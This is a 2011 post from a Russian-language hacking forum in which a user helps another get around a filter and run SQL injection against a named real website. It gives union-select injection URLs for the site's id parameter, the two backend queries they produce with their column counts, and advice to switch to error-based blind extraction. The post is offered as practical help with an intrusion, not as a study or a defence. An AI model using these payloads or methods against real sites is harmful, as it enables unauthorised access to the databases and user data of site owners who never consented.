Показать сообщение отдельно

  #16529  
Старый 08.03.2011, 15:06
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами: 9846041

Репутация: 1177


По умолчанию

Цитата:
Сообщение от FlaktW  
Не могу обойти фильтрацию.
http://www.funade.jp/english/course/detail.php?id=-46+union+select+1,2,3,4,5,6,7,8,9,10,11+--+
Там двойной запрос:

http://www.funade.jp/english/course/detail.php?id=-46+union+select+1,2,3,4,5,6,7,8,9,10,11--+

Код:
SELECT * FROM root where p_id=-46 union select 1,2,3,4,5,6,7,8,9,10,11-- order by rank
http://www.funade.jp/english/course/detail.php?id=-46+union+select+1,2,3,4,5,6,7,8,9,10--+

Код:
SELECT * FROM `place` WHERE id=-46 union select 1,2,3,4,5,6,7,8,9,10-- order by up_date
Либо крути, как слепую с выводом в ошибку, либо: /showpost.php?p=1047515&postcount=48
 
Ответить с цитированием